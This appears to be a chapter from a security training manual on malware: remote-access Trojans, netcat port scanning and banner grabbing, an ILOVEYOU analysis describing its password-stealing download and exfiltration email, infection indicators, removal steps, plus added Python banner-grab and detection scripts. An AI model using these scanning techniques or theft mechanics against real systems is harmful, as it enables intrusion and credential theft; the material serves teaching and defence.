Example Windows ping
C:\WINDOWS> ping yahoo.com
Pinging yahoo.com [216.115.108.245] with 32 bytes of data:
Reply from 216.115.108.245: bytes=32 time=31ms TTL=242
Reply from 216.115.108.245: bytes=32 time=31ms TTL=242
Reply from 216.115.108.245: bytes=32 time=32ms TTL=242
Reply from 216.115.108.245: bytes=32 time=30ms TTL=242
Ping statistics for 216.115.108.245: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 30ms, Maximum = 32ms, Average = 31ms
Chapter-8
Malware Attacks & Countermeasures
Session Objectives:
At the end of this Session, you will be able to understand –
Implications of Malware Attacks
Types of Malware
Hacking Tool: QAZ
Hacking Tool: NETCAT
Hacking Tool: Sub Seven
Hacking Tool: Donald Dick
Hacking Tool: NETBUS
Various Deadly Viruses
Indications of Infection
How Malware Propagates
Malware Countermeasures
Introduction____________________________________
Malicious software (malware) has long been one of the biggest problems computer
users face. Viruses and worms have proved to be the biggest nuisances, but these
types of malware are ineffective if adequate controls are in place. On the other hand,
such types of malware as Trojan horses and rootkits can inflict serious harm against
computers and information, and are much harder to defend against.
8.1 Implications of Malware Attacks________________
Malware is one of the greatest threats to the security of your information. Not only do
you have to deal with the well-known malware — the ILoveYous and Code Reds of the
world — infecting your computers, but also, hackers are constantly developing new
ways to wreak havoc on systems. It seems that every month, widespread malware
attacks take place around the globe. The more recent attacks are mostly self-propagating — which means that they need no user intervention to spread across computer networks and the Internet.
These programs attack unpatched software and gullible users opening malicious e-mail attachments.
Most malware attacks — especially the recent ones — exploit well-known vulnerabilities
that should’ve been fixed months before the attacks occur.
Unfortunately, the general practice within IT and security is to install patches when
people get around to it. This is mostly because people either don’t make it a priority to
patch or simply can’t keep up with all the patches required across all their systems. The
hackers know this and take full advantage of it. The widespread malware attacks that
you hear about on the news aren’t the ones to worry about. Trojan horses, rootkits,
spyware, and other devious programs are the scary ones. These applications can do the
following:
# List running processes and applications
# Load and kill running processes and applications
# Capture keystrokes
# Search and copy files
# Steal passwords
# Edit system files
# Turn on Web cams and microphones
# Remotely reboot computers
# Perform practically any administrative function
Bad things can happen if any of these events occurs on your network, including confidential information being stolen, computers being taken offline, and data being deleted.
8.2 Types of Malware____________________________
Most malware is platform-specific: It targets specific operating systems, applications,
and vulnerabilities to spread more quickly.
8.2.1 Trojan Horses
Trojan horses — named after the infamous Greek wooden horse used to penetrate the
city of Troy — are executable files, often transmitted via e-mail, that masquerade as
legitimate programs but actually perform malicious acts.
Trojan- horse code works in the background — doing things like deleting information,
gathering passwords, and capturing keystrokes — while a legitimate looking program,
such as a screen saver or game, runs in the foreground.
Many Trojans — called remote-access Trojans, or RATs — set up backdoors on the
systems they infect, allowing hackers to access them remotely and control them from
across the Internet. Many Trojans aren’t detected by antivirus programs. With all things
being equal (and antivirus software running), this is the malware you should be afraid of.
Some common RATs are NetBus, SubSeven, and Back Orifice.
Figure: 8.1
Viruses
Computer viruses are the best-known malware category. Viruses are programs that
are often self-replicating — meaning that they can make copies of themselves — and
attach to executable files, deleting information and crashing computers whenever a user
or other process runs the program. Even PDA viruses exist, some of which drain
batteries and call 911 for you — how thoughtful!
Worms
Worms are self-propagating programs that travel around the Internet at lightning speed.
They load up in memory, effectively exploit known software vulnerabilities, and often
end up crashing the systems.
Rootkits
Rootkits are nasty applications that hackers can use to control a computer completely,
with the ultimate prize of crashing the system or stealing information.
Rootkits are mostly found on UNIX systems but are becoming popular on the Windows platform. Rootkits are sets of programs that either
# Masquerade as typical administrator command-line programs, or
# Integrate into the kernel, or core, of the operating system.
Kernel-based rootkits, such as Knark for Linux and the FU rootkit for Windows, tie into the actual operating system. With these programs, hackers can
# Hide system processes and applications from the Windows Task Manager or the process list in UNIX
# Change the group membership of processes and applications so that a malicious program can run as the system, administrator, or root account
# Modify environment variables
# Make programs look like they were run by another user, concealing the hacker's identity in audit logs
8.2.2 Spyware
Spyware programs spy on you and sometimes even capture and transmit confidential
information from your computer. They’re installed as cookies, Windows Registry entries,
and even executables on the local computer.
“Legitimate” spyware that may be installed by an administrator or other person to watch
someone’s computer usage includes SpectorSoft’s eBlaster and Spector Pro, and
TrueActive (formerly known as WinWhatWhere).
These programs are extremely powerful and capture video screen shots, turn on the
local microphone, track Web browsing, and even forward copies of e-mails sent and
received to a third-party address. Powerful and scary!
Adware is similar to spyware but a little less intrusive. It tracks Internet usage and pulls
targeted ads to specific users, based on their habits.
Built-in programming interfaces
Programming interfaces built into operating systems can be used maliciously:
# Java applets are programs written in the Sun Microsystems programming language. Although these programs run in a sandbox — or safe area — to ensure that the local system is not compromised by malicious code, they can still cause security problems.
# Microsoft .NET applications are programs written based on the new application framework from Microsoft. Like Java applets, these programs have their own playpen that helps ensure that malicious code is not executed.
# ActiveX controls are Microsoft-based programs that everyone loves to hate. ActiveX controls can be executed with minimal effort in such applications as Internet Explorer, Outlook, and other Microsoft programs. Their control over a computer can potentially cause serious harm to a computer system and its stored information.
# VBScripts are scaled-down versions of Microsoft's Visual Basic programming language. Similar to ActiveX controls, these scripts can wreak havoc on local data. Many of the common malware programs traversing the Internet today are VBScripts.
# Windows Script Host (WSH) is a script processor built into Windows — similar to DOS batch files — that can be used to perform malicious acts.
# JavaScript programs, which are similar to ActiveX and VBScripts, are written in Netscape's scripting language. They can cause computers harm if users willingly run them within Web browsers and e-mails.
Not all applications written in these programming interfaces are malicious. Many legitimate programs are used every day that run just fine and don't do any harm.
8.2.3 Security tools
Your own security tools can be used against you. This includes the following tools:
# Vulnerability scanners, such as Nessus and even the tried-and-true Netcat tool, can place backdoors in your systems.
# Network analyzers, including the ARP poisoning tools ettercap and dsniff.
8.3 Hacking Tool: QAZ___________________________
The QAZ Trojan infects via an e-mail attachment, or spreads through IRC chat rooms.
Upon infection, the file notepad.exe is renamed to note.com, an infected version of
notepad.exe is planted, and the registry is updated to execute the Trojan when the
system boots.
Figure: 8.2
While it runs, the Trojan listens for incoming connections on TCP port 7597, and enables the attacker to have remote control over the infected computer.
This backdoor Trojan allows hackers to access and control an infected system. TROJ_QAZ was initially distributed as "Notepad.exe" but might also appear with different filenames. Once an infected file is executed, TROJ_QAZ modifies the Windows registry so that it becomes active every time Windows is started. TROJ_QAZ also renames the original "notepad.exe" file to "note.com" and then copies itself as "notepad.exe" to the Windows folder. This way, the Trojan is also launched every time a user runs Notepad. TROJ_QAZ also attempts to spread itself to other shared drives on local networks. This Trojan does not, however, mass-email itself to the lists in the user's address book.
8.4 Hacking Tool: Netcat__________________________
If you only have one tool available to work with, this should be it! Commonly known as
the Swiss army knife of hacking tools, this small program can be used to accomplish
huge tasks.
The examples below only begin to touch on the utility of this tool. Once scripting has been mastered, the auditor may begin to string together the different functions that tools like netcat offer, automate complex tasks and produce the custom results that high-end software suites promise.
nc -h [syntax help screen]
nc -v -v -z -w2 127.0.0.1 1-139 [scan tcp ports 1-139]
nc -v -v -z -w2 127.0.0.1 21 25 80 139 [scan only tcp ports 21, 25, 80 and 139]
nc -v -v -z -w2 -n -p 53 127.0.0.1 80 [send from port 53, scan port 80, no name resolution]
The nc program is illustrated below:
D:\>nc -h
[v1.10 NT]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, stealth mode
        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft
        -i secs         delay interval for lines sent, ports scanned
        -l              listen mode, for inbound connects
        -L              listen harder, re-listen on socket close
        -n              numeric-only IP addresses, no DNS
        -o file         hex dump of traffic
        -p port         local port number
        -r              randomize local and remote ports
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose]
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
Remember that -h is the only command netcat recognizes as a request for syntax help.
If netcat is run with no parameters, it will drop into interactive mode where netcat is
waiting for input.
D:\>nc -v -z -w2 127.0.0.1 1-140
www.TargetHost.net [127.0.0.1] 139 (netbios-ssn) open
www.TargetHost.net [127.0.0.1] 135 (epmap) open
www.TargetHost.net [127.0.0.1] 119 (nntp) open
www.TargetHost.net [127.0.0.1] 110 (pop3) open
www.TargetHost.net [127.0.0.1] 27 (?) open
www.TargetHost.net [127.0.0.1] 25 (smtp) open
Finding:
Here, the parameter -v causes verbose output, while -v -v would generate even more. A
single -v will report the open ports in this case, while -v -v will also report the closed
ports.
In the example above, notice that port 135 and 139 were identified as open. This usually
indicates that the target is either a Windows system or possibly a Unix system running
Samba. Samba is used to allow Unix and Windows systems to take advantage of the shares and resources the other offers.
D:\>nc -v -z -w2 127.0.0.1 139 80
www.TargetHost.net [127.0.0.1] 139 (netbios-ssn) open
www.TargetHost.net [127.0.0.1] 80 (http) open
Finding:
In the above example, netcat is being used to port scan just TCP ports 139 and 80. The
subsequent two lines are the findings.
D:\>nc 127.0.0.1 80 [At this point, press enter once]
HEAD / HTTP/1.0 [At this point, press enter twice]
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Tue, 28 Aug 2001 20:35:20 GMT
Content-Type: text/html
Set-Cookie: ASPSESSIONIDGGQGQQAC=MCOBPPPDDNIHJOHJCHIKFONB; path=/
Cache-control: private
Finding:
Rather than use netcat as a port scanner in the above example, netcat is being used as
a telnet client.
An HTTP packet has been crafted to be sent to TCP port 80, which is well known as the
web server port. Just as a web browser constructs a request that will be sent to the
destination web server asking for a specific page to be returned for display, netcat can
be used to build these same requests in as much detail as the web browser, but the
auditor controls the request.
First netcat is launched with a specific host and port specified; in this case, TCP port 80
on host 127.0.0.1. When the enter key is pressed, netcat understands who the user
wants to talk to, but not what is to be said. So netcat displays a prompt, and begins
waiting for input.
The first line refers to the type of HTTP service requested, HEAD is used to get
information about a page rather than the page itself and GET is used to retrieve the
contents of the specified page.
In this example, the syntax reads: HEAD, give information about this page, not its
contents. The lone "/" forward slash indicates that the user is asking for the default page
this web server provides when no particular page name is provided. In the following
examples, it can be seen how to specify a specific web page. Finally, we tell the web
server we are using HTTP version 1.0.
In the return report, the web server provides several important pieces of information. First, it indicates that this page exists (return code 200) and that the web service software supports the HTTP version 1.1 protocol. Interesting, of course, but not very useful yet.
Second, it identifies the web server software and version.
D:\>nc 127.0.0.1 80 [At this point, press enter once]
GET / HTTP/1.0 [At this point, press enter twice]
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Tue, 28 Aug 2001 20:34:01 GMT
Content-Type: text/html
Set-Cookie: ASPSESSIONIDGGQGQQAC=KCOBPPPDHPGDIANLGHAJPCEO; path=/
Cache-control: private
[... followed by the HTML code for the page]
Finding:
In this example, a GET command has been issued, which returns the actual contents of
the page.
D:\>nc 127.0.0.1 80 [At this point, press enter once]
GET /Finance/home.asp HTTP/1.0 [At this point, press enter twice]
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Tue, 28 Aug 2001 20:34:31 GMT
Content-Type: text/html
Set-Cookie: ASPSESSIONIDGGQGQQAC=LCOBPPPDEPHHECJLAIPEJALG; path=/
Cache-control: private
Finding:
Rather than simply requesting the default page, a specific page has been asked for:
/Finance/home.asp. This can become even more involved and useful when it is realized
that anything seen in the URL address line of the web browser could be typed here and
submitted.
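As an added example (not part of the manual, and not netcat itself), the following Python script builds the same HEAD and GET request bytes the session types by hand and parses a reply into status code, version and headers, so the two facts the text reads off the reply (that the page exists and which server software answered) can be collected for many hosts in an inventory. The sample reply is constructed from the IIS response shown above; the function names build_request, parse_response, summarize_banner and fetch_banner are this example's own, and only fetch_banner needs a network.

```python
import socket

# Constructed sample reply, modelled on the IIS response in the netcat session above.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/4.0\r\n"
    b"Date: Tue, 28 Aug 2001 20:34:01 GMT\r\n"
    b"Content-Type: text/html\r\n"
    b"Set-Cookie: ASPSESSIONIDGGQGQQAC=KCOBPPPDHPGDIANLGHAJPCEO; path=/\r\n"
    b"Cache-control: private\r\n"
    b"\r\n"
    b"<html><body>default page</body></html>"
)


def build_request(method, path="/", host=None, version="1.0"):
    """Build the raw request the netcat session types by hand.

    The request line is followed by an optional Host header and then an empty
    line; that empty line is the second Enter in the session and tells the
    server the headers are complete.
    """
    if method not in ("HEAD", "GET"):
        raise ValueError("only HEAD and GET are used in this example")
    lines = [f"{method} {path} HTTP/{version}"]
    if host is not None:
        lines.append(f"Host: {host}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_response(raw):
    """Split a raw reply into (status_code, version, headers, body).

    Header names are lower-cased so a lookup such as headers["server"] does
    not depend on how the server capitalises them ("Cache-control" above).
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(" ", 2)            # e.g. "HTTP/1.1", "200", "OK"
    version, code = parts[0], int(parts[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return code, version, headers, body


def summarize_banner(raw):
    """The two facts the text reads from the reply: page status and server software."""
    code, version, headers, _ = parse_response(raw)
    return {"status": code, "version": version,
            "server": headers.get("server", "(not disclosed)")}


def fetch_banner(host, port=80, method="HEAD", path="/", timeout=5.0):
    """Do over a socket what the netcat session does by hand.  Needs network
    access, so the offline sample above does not call it."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(method, path, host=host))
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
            # For HEAD the reply ends with the header block; stop there.
            if method == "HEAD" and b"\r\n\r\n" in b"".join(chunks):
                break
    return summarize_banner(b"".join(chunks))


if __name__ == "__main__":
    print(build_request("GET", "/Finance/home.asp").decode())
    print(summarize_banner(SAMPLE_RESPONSE))
```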
8.5 Hacking Tool: SubSeven______________________
SubSeven is a backdoor program that enables others to gain full access to Windows 9x
systems through a network connection.
# The program consists of three different components: Client (SubSeven.exe),
Server (Server.exe) and a Server configuration utility (EditServer.exe).
# The client is a GUI used to connect to the server through a network or internet
connection.
Figure: 8.3
8.6 Hacking Tool: Donald Dick_____________________
Figure: 8.4
Donald Dick is a tool that enables a user to control another computer over a network. It
uses a client/server architecture with the server residing on the victim's computer. The
attacker uses the client to send commands through TCP or SPX to the server listening on
a predefined port on the victim. Donald Dick uses either 23476 or 23477 as its default port.
Figure: 8.5
8.7 Hacking tool: Netbus_________________________
Figure: 8.6
8.8 Various deadly viruses________________________
8.8.1 W32.CIH.Spacefiller (a.k.a Chernobyl)
Chernobyl is a deadly virus. Unlike the other viruses that have surfaced recently, this
one is much more than a nuisance.
# If infected, Chernobyl will erase data on your hard drive, and may even keep your
machine from booting up at all.
# There are several variants in the wild. Each variant activates on a different date:
version 1.2 on April 26th, 1.3 on June 26th, and 1.4 on the 26th of every month.
8.8.2 Win32/ ExploreZip virus
ExploreZip is a Win32-based e-mail worm. It searches for Microsoft Office documents
on your hard drive and network drives.
When it finds any Word, Excel, or PowerPoint documents using the following
extensions: .doc, .xls and .ppt, it erases the contents of those files. It also emails
itself to anyone who sends you an e-mail.
# ExploreZip arrives as an email attachment. The message will most likely come
from someone you know, and the body of the message will read:
"I received your email and I shall send you a reply ASAP. Till then, take a look at the
attached Zipped docs." The attachment will be named "Zipped_files.exe" and have a
WinZip icon. Double clicking the program infects your computer.
The I LOVE YOU Virus
There ain't no love in this little bug!
If you receive email with a subject line with the phrase ILOVEYOU (all one word, no
spaces) in it… DON'T OPEN the attachment named Love-Letter-For-You.txt.vbs.
Over a five-hour period, during May 4, 2000, this virus spread across Asia, Europe and
the United States via e-mail messages titled "ILOVEYOU." The menace clogged Web
servers, overwrote personal files and caused corporate IT managers to shut down email systems.
A scan of the Visual Basic code included in the attachment reveals that the virus may be
corrupting MP3 and JPEG files on users' hard drives, as well as MIRC, a version of
Internet Relay Chat. It also appears to reset the default start page for Internet Explorer.
This virus arrives as e-mail with the subject line "I Love You" and an attachment named
"Love-Letter-For-You.txt.vbs." Opening the attachment infects your computer. The
infection first scans your PC's memory for passwords, which are sent back to the virus's
creator (a Web site in the Philippines which has since been shut down). The infection
then replicates itself to everyone in your Outlook address book. Finally, the infection
corrupts files ending with .vbs, .vbe, .js, .css, .wsh, .sct, .hta, .jpg, .jpeg, .mp2, .mp3 by
overwriting them with a copy of itself.
You can get this bug in only one way. If you receive an email with an attachment with
the name Love-Letter-For-You.txt.vbs and you execute it, by double clicking on the
attachment, you will get infected. Don't execute it, just delete it and you will be fine.
8.8.3 How to keep from becoming infected by this bug
Of course, first and foremost, never open any email attachment that you are uncertain
of. That said, I strongly recommend that if you do not use Visual Basic scripting
(most don't), you should turn this option off. To do so:
# Click your start button
# Click on Settings
# Click on Control Panel
# Double-Click on the Add/Remove Programs icon
# Click on the Windows Setup tab
# Click on Accessories to obtain the details
# Uncheck Windows Scripting Host if it is checked
# Click "ok" to save any changes
Remember, the above will only protect you from the ILOVEYOU virus and its variants.
Other viruses can still get to your computer.
Variations on the ILOVEYOU virus are already hitting the net. The only sure way to
protect yourself from email viruses is, DON'T OPEN ATTACHMENTS even if sent by
someone you know.
8.8.4 If you think you are infected
By now all the anti-virus companies have updates for the ILOVEYOU bug and can
detect if your computer is infected.
If your computer is infected you can delete the following files from your infected system:
# MSKernel32.vbs in the Windows System directory
# Win32DLL.vbs in the Windows directory
# LOVE-LETTER-FOR-YOU.TXT.vbs in the Windows System directory
# WinFAT32.EXE in the Internet download directory
# script.ini in the MIRC directory
8.8.5 Virus Profile: VBS/Loveletter@MM
Risk Assessment - Home Users: Medium
Risk Assessment - Corporate Users: Medium
Date Discovered: 5/4/2000
Date Added: 5/4/2000
Origin: Philippines
Length: 10,307
Type: Virus
SubType: VbScript
DAT Required: 4077
8.8.6 Virus Characteristics
!Note: Ensure that the extensions .VBS, .HTM are included when scanning.
As this detection covers many variants, you may experience symptoms other than those
described below.
This is a VBScript worm with virus qualities. This worm will arrive in an email message
with this format:
Subject "ILOVEYOU"
Message "kindly check the attached LOVELETTER coming from me."
Attachment "LOVE-LETTER-FOR-YOU.TXT.vbs"
(note that other threats use similar filenames, such as W95/MTX.gen@M which uses
the filename LOVE-LETTER-FOR-YOU.TXT.pif):
If the user runs the attachment the worm runs using the Windows Scripting Host
program. This is not normally present on Windows 95 or Windows NT unless Internet
Explorer 5 is installed.
When the worm is first run it drops copies of itself and writes an .HTM file in the
following places :
WINDOWS\SYSTEM\MSKERNEL32.VBS
WINDOWS\WIN32DLL.VBS
WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS
WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM
It also adds the registry keys:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
MSKernel32=WINDOWS\SYSTEM\MSKernel32.vbs
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\
Win32DLL=WINDOWS\Win32DLL.vbs
in order to run the worm at system startup.
This worm searches all drives connected to the host system and replaces the following
files:
*.JPG
*.JPEG
With copies of itself and it adds the extension .VBS to the original filename. So
PICT.JPG would be replaced with PICT.JPG.VBS and this would contain the worm.
The worm also overwrites the following files:
*.VBS
*.VBE
*.JS
*.JSE
*.CSS
*.WSH
*.SCT
*.HTA
With copies of itself and renames the files to *.VBS.
This virus locates instances of the following file types:
*.MP3
*.MP2
and if found, makes them hidden and copies itself as these filenames except with .VBS
extension. For instance, if file exists as "2PAC.MP3", this now becomes a hidden file
and the virus is copied as "2PAC.MP3.VBS".
The worm creates a file 'LOVE-LETTER-FOR-YOU.HTM' which contains the worm and
this is then sent to the IRC channels if the MIRC client is installed. This is accomplished
by the worm replacing the file SCRIPT.INI.
After a short delay the worm uses Microsoft Outlook to send copies of itself to all entries
in the address book. The mails will be of the same format as the original mail.
This worm also has another trick up its sleeve in that it tries to download and install an
executable file called WIN-BUGSFIX.EXE from the Internet. This exe file is a password
stealing program that will email any cached passwords to the mail address
[email protected]
In order to facilitate this download the worm sets the start-up page of Microsoft Internet
Explorer to point to the web-page containing the password stealing Trojan.
The email sent by this program is as follows:
-------------copy of email sent----------
From: [victim machine name]@[victim IP address]
To: [email protected]
Subject: Barok... email.passwords.sender.trojan
X-Mailer: Barok... email.passwords.sender.trojan---by: spyder
Host: [machine name]
Username: [user name]
IP Address: [victim IP address]
RAS Passwords:...[victim password info]
Cache Passwords:...[victim password info]
-------------copy of email sent----------
The password stealing Trojan is also installed by the following registry key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WINBUGSFIX
to autorun it at system startup. After it has been run the password stealing Trojan copies
itself to WINDOWS\SYSTEM\WinFAT32.EXE and replaces the registry key with
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
WinFAT32=WinFAT32.EXE
8.9 Indications of Infection________________________
Existence of files mentioned above, replacement of files as mentioned above. Email
propagation as described above. IRC file distribution as mentioned above.
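The indicators listed in the profile (dropped files, autorun registry values, the .JPG.VBS and .MP3.VBS renames, and the mail format) can be checked mechanically. The Python below is an added example, not part of the manual or of any vendor's scanner: it matches a file listing and a dump of the Run/RunServices values against those indicators. The file list and registry contents are constructed to look like an infected host; find_indicators, looks_like_loveletter_mail and the other names are this example's own.

```python
import re

# Indicators taken from the profile above: the files the worm drops and the
# autorun values it (and the password stealer it fetches) writes.
DROPPED_FILES = (
    r"WINDOWS\SYSTEM\MSKERNEL32.VBS",
    r"WINDOWS\WIN32DLL.VBS",
    r"WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS",
    r"WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM",
    r"WINDOWS\SYSTEM\WINFAT32.EXE",
)
RUN_KEY = r"HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"
RUNSERVICES_KEY = r"HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSERVICES"
AUTORUN_VALUES = {
    (RUN_KEY, "MSKERNEL32"),
    (RUNSERVICES_KEY, "WIN32DLL"),
    (RUN_KEY, "WINBUGSFIX"),
    (RUN_KEY, "WINFAT32"),
}
# PICT.JPG becomes PICT.JPG.VBS, 2PAC.MP3 becomes 2PAC.MP3.VBS, and the mail
# attachment is LOVE-LETTER-FOR-YOU.TXT.vbs: a data extension with .VBS appended.
DOUBLE_EXT = re.compile(r"\.(JPE?G|MP[23]|TXT)\.VBS$", re.IGNORECASE)


def normalise_key(key):
    """Fold the two spellings the profile uses (HKLM\\... and HKEY_LOCAL_MACHINE\\...)."""
    key = key.upper().rstrip("\\")
    prefix = "HKEY_LOCAL_MACHINE\\"
    if key.startswith(prefix):
        key = "HKLM\\" + key[len(prefix):]
    return key


def find_indicators(file_paths, registry_values):
    """Match a file listing and autorun registry values against the indicators.

    file_paths: full paths with any drive letter.
    registry_values: {key_path: {value_name: value_data}}.
    Returns (kind, detail) tuples with kind "file", "double-extension" or "autorun".
    """
    hits = []
    for path in file_paths:
        upper = path.upper()
        name = upper.rsplit("\\", 1)[-1]
        if any(upper.endswith(ioc) for ioc in DROPPED_FILES):
            hits.append(("file", path))
        elif DOUBLE_EXT.search(name):
            hits.append(("double-extension", path))
    for key, values in registry_values.items():
        for value_name, data in values.items():
            if (normalise_key(key), value_name.upper()) in AUTORUN_VALUES:
                hits.append(("autorun", f"{key}\\{value_name}={data}"))
    return hits


def looks_like_loveletter_mail(subject, attachment_name):
    """The message format the profile gives: subject ILOVEYOU, or a .TXT.vbs
    style double-extension attachment (this also catches renamed variants)."""
    return (subject.replace(" ", "").upper() == "ILOVEYOU"
            or DOUBLE_EXT.search(attachment_name) is not None)


def summarize(hits):
    """Count hits per kind, e.g. {"file": 2, "autorun": 3}."""
    counts = {}
    for kind, _ in hits:
        counts[kind] = counts.get(kind, 0) + 1
    return counts


# Constructed sample snapshot of an infected host (not from a real machine).
SAMPLE_FILES = [
    r"C:\WINDOWS\SYSTEM\MSKERNEL32.VBS",
    r"C:\WINDOWS\WIN32DLL.VBS",
    r"C:\WINDOWS\SYSTEM\KERNEL32.DLL",      # legitimate, must not match
    r"D:\PHOTOS\PICT.JPG.VBS",
    r"D:\MUSIC\2PAC.MP3",                   # the hidden original
    r"D:\MUSIC\2PAC.MP3.VBS",
]
SAMPLE_REGISTRY = {
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run": {
        "SystemTray": "SysTray.Exe",        # legitimate, must not match
        "MSKernel32": r"WINDOWS\SYSTEM\MSKernel32.vbs",
        "WinFAT32": "WinFAT32.EXE",
    },
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices": {
        "Win32DLL": r"WINDOWS\Win32DLL.vbs",
    },
}

if __name__ == "__main__":
    for kind, detail in find_indicators(SAMPLE_FILES, SAMPLE_REGISTRY):
        print(f"{kind:17} {detail}")
```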
8.9.1 Method of Infection
This virus will run if Windows Scripting Host is installed. Running the email attachment
received either accidentally or intentionally will install to the local system, and also to all
available drives, send via email message as an attachment and also via IRC if installed.
8.9.2 Removal Instructions
All Users:
Script, Batch, Macro and non memory-resident:
Use current engine and DAT files for detection and removal.
PE, Trojan, Internet Worm and memory resident:
Use specified engine and DAT files for detection. To remove, boot to MS-DOS mode or
use a boot diskette and use the command line scanner:
SCANPM /ADL /CLEAN /ALL
8.9.3 Additional Windows ME/XP removal considerations
Users should not trust file icons, particularly when receiving files from others via P2P
clients, IRC, email or other mediums where users can share files.
AVERT Recommended Updates:
* Office2000 Updates
* Malformed Word Document Could Enable Macro to Run Automatically (Information/Patch)
* Scriptlet.typelib/Eyedog vulnerability patch
* Outlook as an email attachment security update
* Exchange 5.5 post SP3 Information Store Patch 5.5.2652.42 - this patch corrects
detection issues with Group Shield
It is very common for macro viruses to disable options within Office applications for
example in Word, the macro protection warning commonly is disabled. After cleaning
macro viruses, ensure that your previously set options are again enabled.
Aliases: I-Worm.Loveletter, IRC/Loveletter, Love Bug, LOVE-LET.VBS,
LOVE-LETTER-FOR-YOU.TXT.vbs, Loveletter, Troj/LoveLet-A, VBS.Loveletter.a,
VBS/LoveLet-A, VBS/LoveLet-B, VBS/LoveLet-C, VBS/LoveLet-E, VBS/Loveletter.a,
VBS/Loveletter.worm, VBS_LoveLetter, veryfunny.vbs, WIN-BUGSFIX.EXE
Variants (Virus Name / Type / Sub Type: Differences)
VBS/Loveletter.b / Virus / VbScript: Subject="Susitikim shi vakara kavos puodukui..."
VBS/Loveletter.c / Virus / VbScript: Subject="FW: Joke"; Files="Very Funny.vbs","Very Funny.HTM"
VBS/Loveletter.d / Virus / VbScript: Extra " -" due to editor corruption, not spreading.
VBS/Loveletter.af / Virus / VbScript: First line of code is "rem FREE XXX", followed by 120
repeating comment lines; different file created in WINDOWS\SYSTEM\ "FREE SEXSITE
PASSWORDS.HTML.vbs"
VBS/Loveletter.ah / Virus / VbScript: Contains comment line "i am in love with Dorine de Wit",
also has minor formatting of lines
VBS/Loveletter.ag / Virus / VbScript: Contains comment "rem Virusu "te iubesc""
VBS/Loveletter.ae / Virus / VbScript: Insertion of additional comment lines such as:
"rem - vytvooen objektu pro pr ci se systmem soubor"
VBS/Loveletter.ai / Virus / VbScript: Subject: "You May Win $1,000,000! 1 Click Away";
Body: "kindly check the attached WIN coming from me."; Attachment: WIN.vbs. Found by
Virus Patrol in newsgroup; does not contain Trojan download code and not viable due to
bad formatting.
VBS/Loveletter.be / Virus / VbScript: Discovered Aug 25, 2000 - detected without update of
DAT. Similar to VBS/Loveletter.c - JOKE.VBS instead of VERYFUNNY.VBS
8.9.4 Nimda virus
Nimda is a complex virus with a mass mailing worm component which spreads itself in
attachments named README.EXE. It affects Windows 95, 98, ME, NT4 and Windows
2000 users.
Nimda is the first worm to modify existing web sites to start offering infected files for
download. It is also the first worm to use normal end user machines to scan for
vulnerable web sites. Nimda uses the Unicode exploit to infect IIS web servers.
Figure: 8.7
8.10 How Malware Propagates
Some time back — practically forever, in computer time — most malware propagated
via floppy disks. In 1981, the first computer virus was released:
The Apple II Elk Cloner virus. In 1986, the first virus that affected the Microsoft/Intel
platform — the Brain virus — was released. Both of these viruses were floppy-disk–
based, but neither packed the punch that many viruses have come to inflict on their
victims since that time.
Automation
Automated attacks are the wave of the future for malware. The Internet is not going
away. In fact, more systems are going online — more users, more hackers, and a
greater number of applications are emerging that can be affected.
This includes Web services; peer-to-peer (P2P) software, such as instant messaging
(IM); and other file-sharing technologies, such as Gnutella, Kazaa, Morpheus, and
mobile-device applications that run on PDAs and cell phones.
E-mail
The most common malware attack channel is through e-mail. A hacker simply attaches
a virus or Trojan horse to an e-mail — often, through an automated mechanism — and
sends the message to unsuspecting users. This process is automated with self-propagating
worms, making an attack even easier. The text of the e-mail says, “See the
attached note” or “Check out this game.”
Many gullible users open the attachment, thinking it’s something that will brighten up
their day. Instead, it’s malware looking to copy or delete local files and often glean e-mail
addresses from the user’s address book to send itself on to other users. If antivirus
software is missing, outdated, or disabled at the time, this can spell bad news for the
computer or network.
Hacker backdoors
Malware is propagated on computer systems by hackers compromising a host from
across the network or Internet, obtaining administrator or root access by exploiting a
known vulnerability and then installing the malware to their heart’s content. They can set
up backdoors, giving them remote access so they can come back and play in the future.
Many of these infections go unnoticed indefinitely, usually until the network administrator
suspects that something strange is going on, or the system crashes, or information gets
stolen or erased.
Testing
You can carry out various tests to check for malware infections on your network, as
described in the following sections.
Vulnerable malware ports
You should look for Trojan ports when assessing your systems. Here are some common
ones to look out for:
# 31337, 54320, and 54321 (Back Orifice and Back Orifice 2000)
# 12345 and 12346 (NetBus)
# 1243 and 27374 (SubSeven)
